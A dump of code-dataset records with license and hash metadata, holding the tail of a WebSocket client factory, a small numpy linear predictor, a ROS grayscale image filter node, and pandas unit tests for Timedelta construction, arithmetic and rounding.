if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
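# --- Editor's illustrative sketch (not part of the original module) ----------
# A minimal example of how the factory methods above are typically used. It
# assumes WebSocketClientFactory is the client factory class defined earlier
# in this module; the URL, origin and subprotocol values are placeholders.
if __name__ == '__main__':
   factory = WebSocketClientFactory()
   factory.setSessionParameters(url = "ws://127.0.0.1:9000",
                                origin = "http://127.0.0.1",
                                protocols = ["chat"])
   factory.setProtocolOptions(failByDrop = False,        # perform a full closing handshake
                              openHandshakeTimeout = 5,  # seconds allowed for the opening handshake
                              autoFragmentSize = 65536)  # fragment outgoing messages at 64 KiB
   # host/port/resource were filled in by parseWsUrl() inside setSessionParameters
   print("%s:%d%s" % (factory.host, factory.port, factory.resource))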
|
gpl-3.0
| 8,117,406,587,043,622,000
| 37.000746
| 214
| 0.601589
| false
| 4.298251
| false
| false
| false
|
Calvinxc1/Data_Analytics
|
old versions/analysis_classes/Cluster_Control/Cluster_IO/Predict_Cluster/predictor.py
|
1
|
1655
|
#%% Libraries
import numpy as np
import root_funcs as rf
#%% predict_linear class (Module for Process_Node - Predict)
class predict_linear(object):
__lookup_dict = {
'beta_init': {
'zeros': ('Cluster_Control.Cluster_IO.Predict_Cluster.beta_init', 'beta_zeros')
},
'learn_rate': {
'partial_hessian': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'partial_hessian'),
'manual': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'manual')
}
}
__class_type = 'predict_linear'
def __init__(self, beta_init_type = 'zeros', learn_rate_type = 'partial_hessian'):
self.__betas = np.empty((0, 0))
self.__subclasses = {}
self.set_subclass('beta_init', beta_init_type)
self.set_subclass('learn_rate', learn_rate_type)
def get_type(self):
return self.__class_type
def set_subclass(self, subitem, subitem_type, *args, **kwargs):
self.__subclasses[subitem] = (subitem_type, rf.upload_module(self.__lookup_dict[subitem][subitem_type])(*args, **kwargs))
def call_submethod(self, subitem, submethod, *args, **kwargs):
return getattr(self.__subclasses[subitem][1], submethod)(*args, **kwargs)
def get_subclass_type(self, subitem):
return self.__subclasses.get(subitem, (None))[0]
def init_betas(self, feature_count):
self.__betas = self.call_submethod('beta_init', 'initialize', feature_count)
def predict(self, input_data):
return np.dot(input_data, self.__betas)
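# --- Editor's illustrative sketch (not part of the original file) ------------
# Minimal usage of predict_linear, assuming the 'zeros' beta initializer
# resolved through root_funcs.upload_module exposes the initialize() method
# wired in __lookup_dict above; the feature matrix below is made up.
if __name__ == '__main__':
    model = predict_linear()       # defaults: beta_init 'zeros', learn_rate 'partial_hessian'
    model.init_betas(3)            # betas start as zeros for 3 features
    sample = np.ones((5, 3))       # 5 rows, 3 features
    print(model.predict(sample))   # np.dot(sample, betas) -> all zeros until betas are trained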
|
gpl-3.0
| 1,337,883,345,496,032,800
| 35.8
| 129
| 0.598187
| false
| 3.621444
| false
| false
| false
|
OSUrobotics/privacy-interfaces
|
filtering/text_filters/scripts/try_something_new.py
|
1
|
1266
|
#!/usr/bin/env python
import rospy
from cv_bridge import CvBridge
import cv, cv2
import numpy
from sensor_msgs.msg import Image
bridge = CvBridge()
pub = rospy.Publisher("/image_out", Image)
def image_callback(image):
""" Applies a new filter to the image and displays the result. """
image_cv = bridge.imgmsg_to_cv(image)
image_cv2 = numpy.asarray(image_cv)
# Downsample the grayscale image
gray = image_cv2[:, :, 0]/3 + image_cv2[:, :, 1]/3 + image_cv2[:, :, 2]/3
gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
# Make new 3-channel image
image_new = numpy.zeros((gray.shape[0], gray.shape[1], image_cv2.shape[2]))
image_new[:, :, 0] = image_new[:, :, 1] = image_new[:, :, 2] = gray
image_new = image_new.astype('uint8')
print image_new.shape
# Re-publish
image.data = bridge.cv_to_imgmsg(cv.fromarray(image_new),
encoding=image.encoding).data
image.width = image_new.shape[1]
image.height = image_new.shape[0]
image.step = image.width * 3
pub.publish(image)
if __name__ == "__main__":
rospy.init_node("new_filter")
rospy.Subscriber("/camera/rgb/image_color", Image, image_callback)
rospy.spin()
|
mit
| -8,800,374,811,631,611,000
| 29.142857
| 79
| 0.621643
| false
| 3.133663
| false
| false
| false
|
zfrenchee/pandas
|
pandas/tests/scalar/test_timedelta.py
|
1
|
33010
|
""" test the scalar Timedelta """
import pytest
import numpy as np
from datetime import timedelta
import pandas as pd
import pandas.util.testing as tm
from pandas.core.tools.timedeltas import _coerce_scalar_to_timedelta_type as ct
from pandas import (Timedelta, TimedeltaIndex, timedelta_range, Series,
to_timedelta, compat)
from pandas._libs.tslib import iNaT, NaT
class TestTimedeltaArithmetic(object):
_multiprocess_can_split_ = True
def test_arithmetic_overflow(self):
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + pd.Timedelta(13 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + timedelta(days=13 * 19999)
def test_ops_error_str(self):
# GH 13624
td = Timedelta('1 day')
for left, right in [(td, 'a'), ('a', td)]:
with pytest.raises(TypeError):
left + right
with pytest.raises(TypeError):
left > right
assert not left == right
assert left != right
def test_to_timedelta_on_nanoseconds(self):
# GH 9273
result = Timedelta(nanoseconds=100)
expected = Timedelta('100ns')
assert result == expected
result = Timedelta(days=1, hours=1, minutes=1, weeks=1, seconds=1,
milliseconds=1, microseconds=1, nanoseconds=1)
expected = Timedelta(694861001001001)
assert result == expected
result = Timedelta(microseconds=1) + Timedelta(nanoseconds=1)
expected = Timedelta('1us1ns')
assert result == expected
result = Timedelta(microseconds=1) - Timedelta(nanoseconds=1)
expected = Timedelta('999ns')
assert result == expected
result = Timedelta(microseconds=1) + 5 * Timedelta(nanoseconds=-2)
expected = Timedelta('990ns')
assert result == expected
pytest.raises(TypeError, lambda: Timedelta(nanoseconds='abc'))
def test_ops_notimplemented(self):
class Other:
pass
other = Other()
td = Timedelta('1 day')
assert td.__add__(other) is NotImplemented
assert td.__sub__(other) is NotImplemented
assert td.__truediv__(other) is NotImplemented
assert td.__mul__(other) is NotImplemented
assert td.__floordiv__(other) is NotImplemented
def test_timedelta_ops_scalar(self):
# GH 6808
base = pd.to_datetime('20130101 09:01:12.123456')
expected_add = pd.to_datetime('20130101 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta(10, unit='s'), timedelta(seconds=10),
np.timedelta64(10, 's'),
np.timedelta64(10000000000, 'ns'),
pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
base = pd.to_datetime('20130102 09:01:12.123456')
expected_add = pd.to_datetime('20130103 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta('1 day, 00:00:10'),
pd.to_timedelta('1 days, 00:00:10'),
timedelta(days=1, seconds=10),
np.timedelta64(1, 'D') + np.timedelta64(10, 's'),
pd.offsets.Day() + pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
def test_ops_offsets(self):
td = Timedelta(10, unit='d')
assert Timedelta(241, unit='h') == td + pd.offsets.Hour(1)
assert Timedelta(241, unit='h') == pd.offsets.Hour(1) + td
assert 240 == td / pd.offsets.Hour(1)
assert 1 / 240.0 == pd.offsets.Hour(1) / td
assert Timedelta(239, unit='h') == td - pd.offsets.Hour(1)
assert Timedelta(-239, unit='h') == pd.offsets.Hour(1) - td
def test_unary_ops(self):
td = Timedelta(10, unit='d')
# __neg__, __pos__
assert -td == Timedelta(-10, unit='d')
assert -td == Timedelta('-10d')
assert +td == Timedelta(10, unit='d')
# __abs__, __abs__(__neg__)
assert abs(td) == td
assert abs(-td) == td
assert abs(-td) == Timedelta('10d')
def test_binary_ops_nat(self):
td = Timedelta(10, unit='d')
assert (td - pd.NaT) is pd.NaT
assert (td + pd.NaT) is pd.NaT
assert (td * pd.NaT) is pd.NaT
assert (td / pd.NaT) is np.nan
assert (td // pd.NaT) is np.nan
def test_binary_ops_integers(self):
td = Timedelta(10, unit='d')
assert td * 2 == Timedelta(20, unit='d')
assert td / 2 == Timedelta(5, unit='d')
assert td // 2 == Timedelta(5, unit='d')
# invert
assert td * -1 == Timedelta('-10d')
assert -1 * td == Timedelta('-10d')
# can't operate with integers
pytest.raises(TypeError, lambda: td + 2)
pytest.raises(TypeError, lambda: td - 2)
def test_binary_ops_with_timedelta(self):
td = Timedelta(10, unit='d')
assert td - td == Timedelta(0, unit='ns')
assert td + td == Timedelta(20, unit='d')
assert td / td == 1
# invalid multiply with another timedelta
pytest.raises(TypeError, lambda: td * td)
class TestTimedeltaComparison(object):
def test_comparison_object_array(self):
# analogous to GH#15183
td = Timedelta('2 days')
other = Timedelta('3 hours')
arr = np.array([other, td], dtype=object)
res = arr == td
expected = np.array([False, True], dtype=bool)
assert (res == expected).all()
# 2D case
arr = np.array([[other, td],
[td, other]],
dtype=object)
res = arr != td
expected = np.array([[True, False], [False, True]], dtype=bool)
assert res.shape == expected.shape
assert (res == expected).all()
class TestTimedeltas(object):
_multiprocess_can_split_ = True
def setup_method(self, method):
pass
def test_construction(self):
expected = np.timedelta64(10, 'D').astype('m8[ns]').view('i8')
assert Timedelta(10, unit='d').value == expected
assert Timedelta(10.0, unit='d').value == expected
assert Timedelta('10 days').value == expected
assert Timedelta(days=10).value == expected
assert Timedelta(days=10.0).value == expected
expected += np.timedelta64(10, 's').astype('m8[ns]').view('i8')
assert Timedelta('10 days 00:00:10').value == expected
assert Timedelta(days=10, seconds=10).value == expected
assert Timedelta(days=10, milliseconds=10 * 1000).value == expected
assert (Timedelta(days=10, microseconds=10 * 1000 * 1000)
.value == expected)
# gh-8757: test construction with np dtypes
timedelta_kwargs = {'days': 'D',
'seconds': 's',
'microseconds': 'us',
'milliseconds': 'ms',
'minutes': 'm',
'hours': 'h',
'weeks': 'W'}
npdtypes = [np.int64, np.int32, np.int16, np.float64, np.float32,
np.float16]
for npdtype in npdtypes:
for pykwarg, npkwarg in timedelta_kwargs.items():
expected = np.timedelta64(1, npkwarg).astype(
'm8[ns]').view('i8')
assert Timedelta(**{pykwarg: npdtype(1)}).value == expected
# rounding cases
assert Timedelta(82739999850000).value == 82739999850000
assert ('0 days 22:58:59.999850' in str(Timedelta(82739999850000)))
assert Timedelta(123072001000000).value == 123072001000000
assert ('1 days 10:11:12.001' in str(Timedelta(123072001000000)))
# string conversion with/without leading zero
# GH 9570
assert Timedelta('0:00:00') == timedelta(hours=0)
assert Timedelta('00:00:00') == timedelta(hours=0)
assert Timedelta('-1:00:00') == -timedelta(hours=1)
assert Timedelta('-01:00:00') == -timedelta(hours=1)
# more strings & abbrevs
# GH 8190
assert Timedelta('1 h') == timedelta(hours=1)
assert Timedelta('1 hour') == timedelta(hours=1)
assert Timedelta('1 hr') == timedelta(hours=1)
assert Timedelta('1 hours') == timedelta(hours=1)
assert Timedelta('-1 hours') == -timedelta(hours=1)
assert Timedelta('1 m') == timedelta(minutes=1)
assert Timedelta('1.5 m') == timedelta(seconds=90)
assert Timedelta('1 minute') == timedelta(minutes=1)
assert Timedelta('1 minutes') == timedelta(minutes=1)
assert Timedelta('1 s') == timedelta(seconds=1)
assert Timedelta('1 second') == timedelta(seconds=1)
assert Timedelta('1 seconds') == timedelta(seconds=1)
assert Timedelta('1 ms') == timedelta(milliseconds=1)
assert Timedelta('1 milli') == timedelta(milliseconds=1)
assert Timedelta('1 millisecond') == timedelta(milliseconds=1)
assert Timedelta('1 us') == timedelta(microseconds=1)
assert Timedelta('1 micros') == timedelta(microseconds=1)
assert Timedelta('1 microsecond') == timedelta(microseconds=1)
assert Timedelta('1.5 microsecond') == Timedelta('00:00:00.000001500')
assert Timedelta('1 ns') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nano') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nanosecond') == Timedelta('00:00:00.000000001')
# combos
assert Timedelta('10 days 1 hour') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h 1m 1s') == timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s 3us') == -timedelta(
days=10, hours=1, minutes=1, seconds=1, microseconds=3)
        assert Timedelta('-10 days 1 h 1.5m 1s 3us') == -timedelta(
            days=10, hours=1, minutes=1, seconds=31, microseconds=3)
# Currently invalid as it has a - on the hh:mm:dd part
# (only allowed on the days)
pytest.raises(ValueError,
lambda: Timedelta('-10 days -1 h 1.5m 1s 3us'))
# only leading neg signs are allowed
pytest.raises(ValueError,
lambda: Timedelta('10 days -1 h 1.5m 1s 3us'))
# no units specified
pytest.raises(ValueError, lambda: Timedelta('3.1415'))
# invalid construction
tm.assert_raises_regex(ValueError, "cannot construct a Timedelta",
lambda: Timedelta())
tm.assert_raises_regex(ValueError,
"unit abbreviation w/o a number",
lambda: Timedelta('foo'))
tm.assert_raises_regex(ValueError,
"cannot construct a Timedelta from the "
"passed arguments, allowed keywords are ",
lambda: Timedelta(day=10))
# round-trip both for string and value
for v in ['1s', '-1s', '1us', '-1us', '1 day', '-1 day',
'-23:59:59.999999', '-1 days +23:59:59.999999', '-1ns',
'1ns', '-23:59:59.999999999']:
td = Timedelta(v)
assert Timedelta(td.value) == td
# str does not normally display nanos
if not td.nanoseconds:
assert Timedelta(str(td)) == td
assert Timedelta(td._repr_base(format='all')) == td
# floats
expected = np.timedelta64(
10, 's').astype('m8[ns]').view('i8') + np.timedelta64(
500, 'ms').astype('m8[ns]').view('i8')
assert Timedelta(10.5, unit='s').value == expected
# offset
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Second(2)) ==
Timedelta('0 days, 00:00:02'))
# gh-11995: unicode
expected = Timedelta('1H')
result = pd.Timedelta(u'1H')
assert result == expected
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta(u'0 days, 02:00:00'))
pytest.raises(ValueError, lambda: Timedelta(u'foo bar'))
def test_overflow_on_construction(self):
# xref https://github.com/statsmodels/statsmodels/issues/3374
value = pd.Timedelta('1day').value * 20169940
pytest.raises(OverflowError, pd.Timedelta, value)
# xref gh-17637
with pytest.raises(OverflowError):
pd.Timedelta(7 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timedelta(timedelta(days=13 * 19999))
def test_total_seconds_scalar(self):
# see gh-10939
rng = Timedelta('1 days, 10:11:12.100123456')
expt = 1 * 86400 + 10 * 3600 + 11 * 60 + 12 + 100123456. / 1e9
tm.assert_almost_equal(rng.total_seconds(), expt)
rng = Timedelta(np.nan)
assert np.isnan(rng.total_seconds())
def test_repr(self):
assert (repr(Timedelta(10, unit='d')) ==
"Timedelta('10 days 00:00:00')")
assert (repr(Timedelta(10, unit='s')) ==
"Timedelta('0 days 00:00:10')")
assert (repr(Timedelta(10, unit='ms')) ==
"Timedelta('0 days 00:00:00.010000')")
assert (repr(Timedelta(-10, unit='ms')) ==
"Timedelta('-1 days +23:59:59.990000')")
def test_conversion(self):
for td in [Timedelta(10, unit='d'),
Timedelta('1 days, 10:11:12.012345')]:
pydt = td.to_pytimedelta()
assert td == Timedelta(pydt)
assert td == pydt
assert (isinstance(pydt, timedelta) and not isinstance(
pydt, Timedelta))
assert td == np.timedelta64(td.value, 'ns')
td64 = td.to_timedelta64()
assert td64 == np.timedelta64(td.value, 'ns')
assert td == td64
assert isinstance(td64, np.timedelta64)
        # this is NOT equal and cannot be roundtripped (because of the nanos)
td = Timedelta('1 days, 10:11:12.012345678')
assert td != td.to_pytimedelta()
def test_freq_conversion(self):
# truediv
td = Timedelta('1 days 2 hours 3 ns')
result = td / np.timedelta64(1, 'D')
assert result == td.value / float(86400 * 1e9)
result = td / np.timedelta64(1, 's')
assert result == td.value / float(1e9)
result = td / np.timedelta64(1, 'ns')
assert result == td.value
# floordiv
td = Timedelta('1 days 2 hours 3 ns')
result = td // np.timedelta64(1, 'D')
assert result == 1
result = td // np.timedelta64(1, 's')
assert result == 93600
result = td // np.timedelta64(1, 'ns')
assert result == td.value
def test_fields(self):
def check(value):
# that we are int/long like
assert isinstance(value, (int, compat.long))
# compat to datetime.timedelta
rng = to_timedelta('1 days, 10:11:12')
assert rng.days == 1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 0
assert rng.nanoseconds == 0
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# GH 10050
check(rng.days)
check(rng.seconds)
check(rng.microseconds)
check(rng.nanoseconds)
td = Timedelta('-1 days, 10:11:12')
assert abs(td) == Timedelta('13:48:48')
assert str(td) == "-1 days +10:11:12"
assert -td == Timedelta('0 days 13:48:48')
assert -Timedelta('-1 days, 10:11:12').value == 49728000000000
assert Timedelta('-1 days, 10:11:12').value == -49728000000000
rng = to_timedelta('-1 days, 10:11:12.100123456')
assert rng.days == -1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 100 * 1000 + 123
assert rng.nanoseconds == 456
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# components
tup = pd.to_timedelta(-1, 'us').components
assert tup.days == -1
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
# GH 10050
check(tup.days)
check(tup.hours)
check(tup.minutes)
check(tup.seconds)
check(tup.milliseconds)
check(tup.microseconds)
check(tup.nanoseconds)
tup = Timedelta('-1 days 1 us').components
assert tup.days == -2
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
def test_nat_converters(self):
assert to_timedelta('nat', box=False).astype('int64') == iNaT
assert to_timedelta('nan', box=False).astype('int64') == iNaT
def testit(unit, transform):
# array
result = to_timedelta(np.arange(5), unit=unit)
expected = TimedeltaIndex([np.timedelta64(i, transform(unit))
for i in np.arange(5).tolist()])
tm.assert_index_equal(result, expected)
# scalar
result = to_timedelta(2, unit=unit)
expected = Timedelta(np.timedelta64(2, transform(unit)).astype(
'timedelta64[ns]'))
assert result == expected
# validate all units
# GH 6855
for unit in ['Y', 'M', 'W', 'D', 'y', 'w', 'd']:
testit(unit, lambda x: x.upper())
for unit in ['days', 'day', 'Day', 'Days']:
testit(unit, lambda x: 'D')
for unit in ['h', 'm', 's', 'ms', 'us', 'ns', 'H', 'S', 'MS', 'US',
'NS']:
testit(unit, lambda x: x.lower())
# offsets
# m
testit('T', lambda x: 'm')
# ms
testit('L', lambda x: 'ms')
def test_numeric_conversions(self):
assert ct(0) == np.timedelta64(0, 'ns')
assert ct(10) == np.timedelta64(10, 'ns')
assert ct(10, unit='ns') == np.timedelta64(10, 'ns').astype('m8[ns]')
assert ct(10, unit='us') == np.timedelta64(10, 'us').astype('m8[ns]')
assert ct(10, unit='ms') == np.timedelta64(10, 'ms').astype('m8[ns]')
assert ct(10, unit='s') == np.timedelta64(10, 's').astype('m8[ns]')
assert ct(10, unit='d') == np.timedelta64(10, 'D').astype('m8[ns]')
def test_timedelta_conversions(self):
assert (ct(timedelta(seconds=1)) ==
np.timedelta64(1, 's').astype('m8[ns]'))
assert (ct(timedelta(microseconds=1)) ==
np.timedelta64(1, 'us').astype('m8[ns]'))
assert (ct(timedelta(days=1)) ==
np.timedelta64(1, 'D').astype('m8[ns]'))
def test_round(self):
t1 = Timedelta('1 days 02:34:56.789123456')
t2 = Timedelta('-1 days 02:34:56.789123456')
for (freq, s1, s2) in [('N', t1, t2),
('U', Timedelta('1 days 02:34:56.789123000'),
Timedelta('-1 days 02:34:56.789123000')),
('L', Timedelta('1 days 02:34:56.789000000'),
Timedelta('-1 days 02:34:56.789000000')),
('S', Timedelta('1 days 02:34:57'),
Timedelta('-1 days 02:34:57')),
('2S', Timedelta('1 days 02:34:56'),
Timedelta('-1 days 02:34:56')),
('5S', Timedelta('1 days 02:34:55'),
Timedelta('-1 days 02:34:55')),
('T', Timedelta('1 days 02:35:00'),
Timedelta('-1 days 02:35:00')),
('12T', Timedelta('1 days 02:36:00'),
Timedelta('-1 days 02:36:00')),
('H', Timedelta('1 days 03:00:00'),
Timedelta('-1 days 03:00:00')),
('d', Timedelta('1 days'),
Timedelta('-1 days'))]:
r1 = t1.round(freq)
assert r1 == s1
r2 = t2.round(freq)
assert r2 == s2
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
t1 = timedelta_range('1 days', periods=3, freq='1 min 2 s 3 us')
t2 = -1 * t1
t1a = timedelta_range('1 days', periods=3, freq='1 min 2 s')
t1c = pd.TimedeltaIndex([1, 1, 1], unit='D')
# note that negative times round DOWN! so don't give whole numbers
for (freq, s1, s2) in [('N', t1, t2),
('U', t1, t2),
('L', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('S', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('12T', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('H', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('d', t1c,
pd.TimedeltaIndex([-1, -1, -1], unit='D')
)]:
r1 = t1.round(freq)
tm.assert_index_equal(r1, s1)
r2 = t2.round(freq)
tm.assert_index_equal(r2, s2)
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
def test_contains(self):
# Checking for any NaT-like objects
# GH 13603
td = to_timedelta(range(5), unit='d') + pd.offsets.Hour(1)
for v in [pd.NaT, None, float('nan'), np.nan]:
assert not (v in td)
td = to_timedelta([pd.NaT])
for v in [pd.NaT, None, float('nan'), np.nan]:
assert (v in td)
def test_identity(self):
td = Timedelta(10, unit='d')
assert isinstance(td, Timedelta)
assert isinstance(td, timedelta)
def test_short_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
assert ct('10') == np.timedelta64(10, 'ns')
assert ct('10ns') == np.timedelta64(10, 'ns')
assert ct('100') == np.timedelta64(100, 'ns')
assert ct('100ns') == np.timedelta64(100, 'ns')
assert ct('1000') == np.timedelta64(1000, 'ns')
assert ct('1000ns') == np.timedelta64(1000, 'ns')
assert ct('1000NS') == np.timedelta64(1000, 'ns')
assert ct('10us') == np.timedelta64(10000, 'ns')
assert ct('100us') == np.timedelta64(100000, 'ns')
assert ct('1000us') == np.timedelta64(1000000, 'ns')
assert ct('1000Us') == np.timedelta64(1000000, 'ns')
assert ct('1000uS') == np.timedelta64(1000000, 'ns')
assert ct('1ms') == np.timedelta64(1000000, 'ns')
assert ct('10ms') == np.timedelta64(10000000, 'ns')
assert ct('100ms') == np.timedelta64(100000000, 'ns')
assert ct('1000ms') == np.timedelta64(1000000000, 'ns')
assert ct('-1s') == -np.timedelta64(1000000000, 'ns')
assert ct('1s') == np.timedelta64(1000000000, 'ns')
assert ct('10s') == np.timedelta64(10000000000, 'ns')
assert ct('100s') == np.timedelta64(100000000000, 'ns')
assert ct('1000s') == np.timedelta64(1000000000000, 'ns')
assert ct('1d') == conv(np.timedelta64(1, 'D'))
assert ct('-1d') == -conv(np.timedelta64(1, 'D'))
assert ct('1D') == conv(np.timedelta64(1, 'D'))
assert ct('10D') == conv(np.timedelta64(10, 'D'))
assert ct('100D') == conv(np.timedelta64(100, 'D'))
assert ct('1000D') == conv(np.timedelta64(1000, 'D'))
assert ct('10000D') == conv(np.timedelta64(10000, 'D'))
# space
assert ct(' 10000D ') == conv(np.timedelta64(10000, 'D'))
assert ct(' - 10000D ') == -conv(np.timedelta64(10000, 'D'))
# invalid
pytest.raises(ValueError, ct, '1foo')
pytest.raises(ValueError, ct, 'foo')
def test_full_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
d1 = np.timedelta64(1, 'D')
assert ct('1days') == conv(d1)
assert ct('1days,') == conv(d1)
assert ct('- 1days,') == -conv(d1)
assert ct('00:00:01') == conv(np.timedelta64(1, 's'))
assert ct('06:00:01') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.0') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.01') == conv(np.timedelta64(
1000 * (6 * 3600 + 1) + 10, 'ms'))
assert (ct('- 1days, 00:00:01') ==
conv(-d1 + np.timedelta64(1, 's')))
assert (ct('1days, 06:00:01') ==
conv(d1 + np.timedelta64(6 * 3600 + 1, 's')))
assert (ct('1days, 06:00:01.01') ==
conv(d1 + np.timedelta64(1000 * (6 * 3600 + 1) + 10, 'ms')))
# invalid
pytest.raises(ValueError, ct, '- 1days, 00')
def test_overflow(self):
# GH 9442
s = Series(pd.date_range('20130101', periods=100000, freq='H'))
s[0] += pd.Timedelta('1s 1ms')
# mean
result = (s - s.min()).mean()
expected = pd.Timedelta((pd.DatetimeIndex((s - s.min())).asi8 / len(s)
).sum())
# the computation is converted to float so
# might be some loss of precision
assert np.allclose(result.value / 1000, expected.value / 1000)
# sum
pytest.raises(ValueError, lambda: (s - s.min()).sum())
s1 = s[0:10000]
pytest.raises(ValueError, lambda: (s1 - s1.min()).sum())
s2 = s[0:1000]
result = (s2 - s2.min()).sum()
def test_pickle(self):
v = Timedelta('1 days 10:11:12.0123456')
v_p = tm.round_trip_pickle(v)
assert v == v_p
def test_timedelta_hash_equality(self):
# GH 11129
v = Timedelta(1, 'D')
td = timedelta(days=1)
assert hash(v) == hash(td)
d = {td: 2}
assert d[v] == 2
tds = timedelta_range('1 second', periods=20)
assert all(hash(td) == hash(td.to_pytimedelta()) for td in tds)
# python timedeltas drop ns resolution
ns_td = Timedelta(1, 'ns')
assert hash(ns_td) != hash(ns_td.to_pytimedelta())
def test_implementation_limits(self):
min_td = Timedelta(Timedelta.min)
max_td = Timedelta(Timedelta.max)
# GH 12727
# timedelta limits correspond to int64 boundaries
assert min_td.value == np.iinfo(np.int64).min + 1
assert max_td.value == np.iinfo(np.int64).max
# Beyond lower limit, a NAT before the Overflow
assert (min_td - Timedelta(1, 'ns')) is NaT
with pytest.raises(OverflowError):
min_td - Timedelta(2, 'ns')
with pytest.raises(OverflowError):
max_td + Timedelta(1, 'ns')
# Same tests using the internal nanosecond values
td = Timedelta(min_td.value - 1, 'ns')
assert td is NaT
with pytest.raises(OverflowError):
Timedelta(min_td.value - 2, 'ns')
with pytest.raises(OverflowError):
Timedelta(max_td.value + 1, 'ns')
def test_timedelta_arithmetic(self):
data = pd.Series(['nat', '32 days'], dtype='timedelta64[ns]')
deltas = [timedelta(days=1), Timedelta(1, unit='D')]
for delta in deltas:
result_method = data.add(delta)
result_operator = data + delta
expected = pd.Series(['nat', '33 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
result_method = data.sub(delta)
result_operator = data - delta
expected = pd.Series(['nat', '31 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
# GH 9396
result_method = data.div(delta)
result_operator = data / delta
expected = pd.Series([np.nan, 32.], dtype='float64')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
def test_apply_to_timedelta(self):
timedelta_NaT = pd.to_timedelta('NaT')
list_of_valid_strings = ['00:00:01', '00:00:02']
a = pd.to_timedelta(list_of_valid_strings)
b = Series(list_of_valid_strings).apply(pd.to_timedelta)
